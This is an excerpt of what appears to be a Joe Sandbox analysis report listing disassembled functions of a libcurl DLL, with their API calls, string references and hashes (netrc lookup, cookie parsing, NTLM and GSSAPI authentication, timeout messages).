                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_msnprintf
                                                                                                                                  • String ID: %c%c%c%c$%c%c%c=$%c%c==
                                                                                                                                  • API String ID: 1809024409-3943651191
                                                                                                                                  • Opcode ID: b7315270e009c58a3ea1e8fb7d20fe42c3308f0b6faf5c5a86a4b33f57ac2916
                                                                                                                                  • Instruction ID: 44c8275215779661be0c97ba8023335651a0e3793c61205ff4c7e912de629461
                                                                                                                                  • Opcode Fuzzy Hash: b7315270e009c58a3ea1e8fb7d20fe42c3308f0b6faf5c5a86a4b33f57ac2916
                                                                                                                                  • Instruction Fuzzy Hash: 4751F4719081A55FDB01DF688891BFE7FF89F46305F0545E6ECA4DB252E638CA12CBA0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_mvsnprintf
                                                                                                                                  • String ID: %s: %s, %02d %s %4d %02d:%02d:%02d GMT$If-Modified-Since$If-Unmodified-Since$Invalid TIMEVALUE$Last-Modified
                                                                                                                                  • API String ID: 3418963191-4153637960
                                                                                                                                  • Opcode ID: 3355b1234afa649fb0f7d7ec5efacead545ef475a81cdcfe41abe60542f74cb4
                                                                                                                                  • Instruction ID: 74776673512f49fd045c1bdc8fbc013f4df0fe833d929bf1bdf8ae0af055c8f8
                                                                                                                                  • Opcode Fuzzy Hash: 3355b1234afa649fb0f7d7ec5efacead545ef475a81cdcfe41abe60542f74cb4
                                                                                                                                  • Instruction Fuzzy Hash: 36312D32A4010DABCF10DFB8DD51AADB7B8FF49754F100069E90997251DB3AD915DB90
                                                                                                                                  APIs
                                                                                                                                  • curl_getenv.LIBCURL(HOME,000003DC,00000000,000003D8,?,6B8E42F0,?,00000000,00000000,00000000,?,?), ref: 6B8FA136
                                                                                                                                    • Part of subcall function 6B8E6310: GetEnvironmentVariableA.KERNEL32(?,00000000,00000001), ref: 6B8E633A
                                                                                                                                  • curl_maprintf.LIBCURL(%s%s.netrc,00000000,6B93F918,00000000), ref: 6B8FA157
                                                                                                                                  • curl_maprintf.LIBCURL(%s%s_netrc,00000000,6B93F918), ref: 6B8FA196
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_maprintf$EnvironmentVariablecurl_getenv
                                                                                                                                  • String ID: %s%s.netrc$%s%s_netrc$HOME
                                                                                                                                  • API String ID: 2809420521-3384076093
                                                                                                                                  • Opcode ID: 439baf2fe8d0492899c1aab9d54172a95149d82626ae4d1116ebaf5c06abbecf
                                                                                                                                  • Instruction ID: 708f44e63ffcb642fbe48d95d6cab0752bf96b952fcb87a91c5ffc9c2f0adc99
                                                                                                                                  • Opcode Fuzzy Hash: 439baf2fe8d0492899c1aab9d54172a95149d82626ae4d1116ebaf5c06abbecf
                                                                                                                                  • Instruction Fuzzy Hash: 02216237544129BB8F011FA8AD05ACB3B79EF862B9B044971FD1883121D73BC57297B1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                  • API String ID: 0-537541572
                                                                                                                                  • Opcode ID: 2bf8a3e2e317776a4dc1fcd6313891f864fecb247dae3711d4d289da9f2935f9
                                                                                                                                  • Instruction ID: 190c0318980caaa46d8bcf8dd1a1ebf9c5a4918d026d3706bd86001d5088bdf1
                                                                                                                                  • Opcode Fuzzy Hash: 2bf8a3e2e317776a4dc1fcd6313891f864fecb247dae3711d4d289da9f2935f9
                                                                                                                                  • Instruction Fuzzy Hash: D421E736D69621BBDB215B648C92B0A376C9F027BCF110170ED55E728AD738ED01C6E1
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6B935EB6: _free.LIBCMT ref: 6B935EDB
                                                                                                                                  • _free.LIBCMT ref: 6B935F3C
                                                                                                                                    • Part of subcall function 6B92F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0), ref: 6B92F800
                                                                                                                                    • Part of subcall function 6B92F7EA: GetLastError.KERNEL32(6B9538A0,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0,6B9538A0), ref: 6B92F812
                                                                                                                                  • _free.LIBCMT ref: 6B935F47
                                                                                                                                  • _free.LIBCMT ref: 6B935F52
                                                                                                                                  • _free.LIBCMT ref: 6B935FA6
                                                                                                                                  • _free.LIBCMT ref: 6B935FB1
                                                                                                                                  • _free.LIBCMT ref: 6B935FBC
                                                                                                                                  • _free.LIBCMT ref: 6B935FC7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: a8bb62acc84794d0cec4dfd56d9c4c222a678d525f8e7b70c7cbbc07179f796b
                                                                                                                                  • Instruction ID: b25ea3cd88e12d8de297041e3b9f6795d59c86967c9e7112833a40892a9354c0
                                                                                                                                  • Opcode Fuzzy Hash: a8bb62acc84794d0cec4dfd56d9c4c222a678d525f8e7b70c7cbbc07179f796b
                                                                                                                                  • Instruction Fuzzy Hash: 7C112971D45B14FAEA30EBB0CC46FCB7BDDBF2870DF400915A29AA6060DB79E5048690
                                                                                                                                  APIs
                                                                                                                                  • curl_maprintf.LIBCURL(%s%s%s%s%s%s%I64d%s%s,#HttpOnly_,6B93B98E,unknown,6B93B988,6B93B868,6B93B988,100C15FF,5D8B6B95,74DB8504,6B93B98E,00000000,00000000,00000000), ref: 6B8D6B55
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_maprintf
                                                                                                                                  • String ID: #HttpOnly_$%s%s%s%s%s%s%I64d%s%s$FALSE$TRUE$unknown
                                                                                                                                  • API String ID: 3307269620-3622669638
                                                                                                                                  • Opcode ID: fa614c5637c284cdecbd0225f511c1297e7a6d4878214d533360672b7224b16d
                                                                                                                                  • Instruction ID: 780345763ad898ac237884a693229197679a612c7c68b69be682ab031de3d013
                                                                                                                                  • Opcode Fuzzy Hash: fa614c5637c284cdecbd0225f511c1297e7a6d4878214d533360672b7224b16d
                                                                                                                                  • Instruction Fuzzy Hash: 14118264700659AFEB148A65DC95B52FBF9AF49394F0582D9EC08DB203D325DD80C7A1
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleCP.KERNEL32(6B9292EA,00000000,?), ref: 6B92E504
                                                                                                                                  • __fassign.LIBCMT ref: 6B92E6E3
                                                                                                                                  • __fassign.LIBCMT ref: 6B92E700
                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B92E748
                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6B92E788
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B92E834
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4031098158-0
                                                                                                                                  • Opcode ID: 4265f063cbd7fe2a788f12f67cdbdbaa8c7601ff17c1a0ab179b8c2ad8854b2a
                                                                                                                                  • Instruction ID: c1863fe4f3d5ce49cf7c67ac4d93ec71dbf82f5314af6e79ab4120ba7068d214
                                                                                                                                  • Opcode Fuzzy Hash: 4265f063cbd7fe2a788f12f67cdbdbaa8c7601ff17c1a0ab179b8c2ad8854b2a
                                                                                                                                  • Instruction Fuzzy Hash: 44D1BA75D256589FCF15CFA8C8C09EDBBB9BF09304F28016AE855BB245E334E946CB50
                                                                                                                                  APIs
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD266
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD27A
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD2CC
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD2F9
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD362
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD4C1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 885266447-0
                                                                                                                                  • Opcode ID: 193fb2b233c6687e6d7748bdc0fcc155be9083024f1308d3ad034d1fb19cc984
                                                                                                                                  • Instruction ID: 0811846a7ff67bf1d12e3cd0a54fdfa6cb68c869a86bbbbba23e8e2c342ca959
                                                                                                                                  • Opcode Fuzzy Hash: 193fb2b233c6687e6d7748bdc0fcc155be9083024f1308d3ad034d1fb19cc984
                                                                                                                                  • Instruction Fuzzy Hash: A2A1F374E442059BDB10CF78C881BAA7BB8EF95358F1486B9ED1C9B345EB34A941C7A0
                                                                                                                                  APIs
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000004,?,?), ref: 6B91500B
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,?,00000001,00000004,?,?), ref: 6B915012
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,?,00000020,00000005,?,00000001,00000004,?,?), ref: 6B91501F
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,?,00000010,00000005,?,00000020,00000005,?,00000001,00000004,?,?), ref: 6B915026
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,00000005,?,00000020,00000005,?,00000001,00000004,?,?), ref: 6B915032
                                                                                                                                  • VerifyVersionInfoA.KERNEL32(0000009C,00000033,00000000), ref: 6B91503F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2793162063-0
                                                                                                                                  • Opcode ID: 5ab8ea67c4a4f8b582ae2405d261572ed707b292bd7a325f2860dc30ac8f0ed2
                                                                                                                                  • Instruction ID: 8e70ea689f4452d1ce358156af12b5272f0db257eebfdbb5a60e8ef365b52587
                                                                                                                                  • Opcode Fuzzy Hash: 5ab8ea67c4a4f8b582ae2405d261572ed707b292bd7a325f2860dc30ac8f0ed2
                                                                                                                                  • Instruction Fuzzy Hash: 7C316170B4835CAEEF20CA688C49F9B7BB8AB47704F1100D9B54D67381C6749E849F62
                                                                                                                                  APIs
                                                                                                                                  • htonl.WS2_32(?), ref: 6B9165CA
                                                                                                                                  • htonl.WS2_32(?), ref: 6B916626
                                                                                                                                    • Part of subcall function 6B9006B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,6B8F6C24), ref: 6B9006EF
                                                                                                                                    • Part of subcall function 6B9006B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B90072F
                                                                                                                                  Strings
                                                                                                                                  • GSSAPI handshake failure (invalid security data), xrefs: 6B916583
                                                                                                                                  • GSSAPI handshake failure (empty security message), xrefs: 6B916561, 6B91681F
                                                                                                                                  • GSSAPI handshake failure (invalid security layer), xrefs: 6B9165BA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: htonl$curl_msnprintfcurl_mvsnprintf
                                                                                                                                  • String ID: GSSAPI handshake failure (empty security message)$GSSAPI handshake failure (invalid security data)$GSSAPI handshake failure (invalid security layer)
                                                                                                                                  • API String ID: 3222853418-242323837
                                                                                                                                  • Opcode ID: 294a2cdd1afef918a1a4d19a3ffe38aa4665b158d9a4289c50b14cafbfec87db
                                                                                                                                  • Instruction ID: bb8c206ab6d80a2c74fbb3f52cf785744c43331b719e355f2d5e343ebadb6bfc
                                                                                                                                  • Opcode Fuzzy Hash: 294a2cdd1afef918a1a4d19a3ffe38aa4665b158d9a4289c50b14cafbfec87db
                                                                                                                                  • Instruction Fuzzy Hash: A8D15BB6D04228EFCF10DFA8D845B9DBBB8FF0A315F1041A9E809A7251DB39D915DB60
                                                                                                                                  Strings
                                                                                                                                  • Operation timed out after %I64d milliseconds with %I64d out of %I64d bytes received, xrefs: 6B8F8A9F
                                                                                                                                  • Connection timed out after %I64d milliseconds, xrefs: 6B8F8A47
                                                                                                                                  • Operation timed out after %I64d milliseconds with %I64d bytes received, xrefs: 6B8F8AD1
                                                                                                                                  • Resolving timed out after %I64d milliseconds, xrefs: 6B8F8A12
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_mvsnprintf
                                                                                                                                  • String ID: Connection timed out after %I64d milliseconds$Operation timed out after %I64d milliseconds with %I64d bytes received$Operation timed out after %I64d milliseconds with %I64d out of %I64d bytes received$Resolving timed out after %I64d milliseconds
                                                                                                                                  • API String ID: 3418963191-3898356422
                                                                                                                                  • Opcode ID: b73d54a893f2023418bff342c8cfd9930ef54d950dd56330251015528e2fe850
                                                                                                                                  • Instruction ID: c4a989cc5178861f0827c81aac35c08c24930bce6cb07f4fb80f8ce30c43f13b
                                                                                                                                  • Opcode Fuzzy Hash: b73d54a893f2023418bff342c8cfd9930ef54d950dd56330251015528e2fe850
                                                                                                                                  • Instruction Fuzzy Hash: 4AC13970A006049FE7109F3DCC42FAB77E8EF45358F00499DE8599B252D739E986C7A2
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,6B920324,6B91E939,6B91E49A,?,6B91E6B7,?,00000001,?,?,00000001,?,6B94E298,0000000C,6B91E7AB), ref: 6B920592
                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6B9205A0
                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6B9205B9
                                                                                                                                  • SetLastError.KERNEL32(00000000,6B91E6B7,?,00000001,?,?,00000001,?,6B94E298,0000000C,6B91E7AB,?,00000001,?), ref: 6B92060B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                  • Opcode ID: be4e74862ce736eb44082f3ba373571857ed21968a3f797a4728826249446e2b
                                                                                                                                  • Instruction ID: e75f3b85cadc5c27ae5e8e2ee120ebd8a2341ad5e1ea771fe5259411c66cedc2
                                                                                                                                  • Opcode Fuzzy Hash: be4e74862ce736eb44082f3ba373571857ed21968a3f797a4728826249446e2b
                                                                                                                                  • Instruction Fuzzy Hash: 8F012833D6D2116FD71526756CA595B3BA8EB26BBCB2003B9F510540D8EF3AC8005684
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ../$/..$/../$/./
                                                                                                                                  • API String ID: 0-456519384
                                                                                                                                  • Opcode ID: 79b10fdf95fccf1a41efd1cc37e2a4d873453d4f0c733adaf4e3e99863c8ed3a
                                                                                                                                  • Instruction ID: 421b4036b0074d7fa564b4587091038331076e70abe10538e868866d17773701
                                                                                                                                  • Opcode Fuzzy Hash: 79b10fdf95fccf1a41efd1cc37e2a4d873453d4f0c733adaf4e3e99863c8ed3a
                                                                                                                                  • Instruction Fuzzy Hash: A8710D66E4C195DAD7110E38A8B57A27FB69F53358F9809E7C9898B203F72FC409C361
                                                                                                                                  APIs
                                                                                                                                  • curl_strnequal.LIBCURL(Set-Cookie:,00000000,0000000B,?,?,?,?,?,?,?), ref: 6B8D6449
                                                                                                                                  • curl_slist_free_all.LIBCURL(?), ref: 6B8D64F5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_slist_free_allcurl_strnequal
                                                                                                                                  • String ID: Set-Cookie:$ignoring failed cookie_init for %s$none
                                                                                                                                  • API String ID: 2653667558-4095489131
                                                                                                                                  • Opcode ID: e9d8370197b4576145c030739bb117e610213429682889d488d9707b4d7fc510
                                                                                                                                  • Instruction ID: 8c7f7df9af04f87317220dbbc69e84baee29eb588548e0a4e2f2fc1e587394c5
                                                                                                                                  • Opcode Fuzzy Hash: e9d8370197b4576145c030739bb117e610213429682889d488d9707b4d7fc510
                                                                                                                                  • Instruction Fuzzy Hash: 886156B5D04358ABEB018F748C42BAA7B755F1670CF0848EAED486B343EB7AD505C7A1
                                                                                                                                  APIs
                                                                                                                                  • curl_maprintf.LIBCURL(%sAuthorization: NTLM %s,Proxy-,00000000,?,?,?,?,?,?,00000000,?), ref: 6B8EE253
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_maprintf
                                                                                                                                  • String ID: %sAuthorization: NTLM %s$HTTP$Proxy-
                                                                                                                                  • API String ID: 3307269620-3667642693
                                                                                                                                  • Opcode ID: 6fdc2434185ac1002988a8f5d1cbb33ff30dec61ca04e154e3755b986ef15f52
                                                                                                                                  • Instruction ID: dc67b02d4a7bb9a939938198ec7fc8d06fb28bb0c8040d451d3862d127bf5738
                                                                                                                                  • Opcode Fuzzy Hash: 6fdc2434185ac1002988a8f5d1cbb33ff30dec61ca04e154e3755b986ef15f52
                                                                                                                                  • Instruction Fuzzy Hash: D8713C75A00619EFDB51CFA8C841BAEBBF5FB4A315F0045AAE804E7210D375AE50DFA0
                                                                                                                                  APIs
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E44EA
                                                                                                                                  Strings
                                                                                                                                  • Invalid IPv6 address format, xrefs: 6B8E44D7
                                                                                                                                  • No valid port number in connect to host string (%s), xrefs: 6B8E452E
                                                                                                                                  • Please URL encode %% as %%25, see RFC 6874., xrefs: 6B8E447B
                                                                                                                                  • %25, xrefs: 6B8E446A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ___from_strstr_to_strchr
                                                                                                                                  • String ID: %25$Invalid IPv6 address format$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.
                                                                                                                                  • API String ID: 601868998-2404041592
                                                                                                                                  • Opcode ID: 292a7a6ec1b204848c9c76ede7462d948fae4c6d7ee76bb4501a1735dcf798a0
                                                                                                                                  • Instruction ID: d2cd9f64c424bb14a5e5d6f58aef076b64c55e6e54a85b74b9a77aa19a1aff0e
                                                                                                                                  • Opcode Fuzzy Hash: 292a7a6ec1b204848c9c76ede7462d948fae4c6d7ee76bb4501a1735dcf798a0
                                                                                                                                  • Instruction Fuzzy Hash: 095137B5A492546AEB114E38AC117AE3BA59F8331CF0C09F5ECAC87241E73DC55386B2
                                                                                                                                  APIs
                                                                                                                                  • curl_maprintf.LIBCURL(%s%s%s,6B93D4D4,?,6B93D4D0,?,00000000,00000000,?,?,6B8E308E,?,00000000,?), ref: 6B8E4603
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E4663
                                                                                                                                    • Part of subcall function 6B9006B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,6B8F6C24), ref: 6B9006EF
                                                                                                                                    • Part of subcall function 6B9006B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B90072F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ___from_strstr_to_strchrcurl_maprintfcurl_msnprintfcurl_mvsnprintf
                                                                                                                                  • String ID: %s%s%s$Connecting to hostname: %s$Connecting to port: %d
                                                                                                                                  • API String ID: 3946109057-1840313707
                                                                                                                                  • Opcode ID: 9bca81e3b1aaa5adbb65d0a9a54ea2ecd45501c223a8f6cb78d6b29f6c09ae06
                                                                                                                                  • Instruction ID: 6aec00bb2c67524ee0d73a3d156eeaa0c00da4bf28e6766e7c261caae7325d4c
                                                                                                                                  • Opcode Fuzzy Hash: 9bca81e3b1aaa5adbb65d0a9a54ea2ecd45501c223a8f6cb78d6b29f6c09ae06
                                                                                                                                  • Instruction Fuzzy Hash: 3351D675D05618AFDB018F68C84069E7BB8EF87314F0845A5EC6CAB342D7789A018BF1
                                                                                                                                  APIs
                                                                                                                                  • curl_strnequal.LIBCURL(NTLM,6B8EB6E6,00000004,00000DD0,?,?,?,6B8EB6E6,?,?,?,?,?,?,00000000,?), ref: 6B8EE00B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
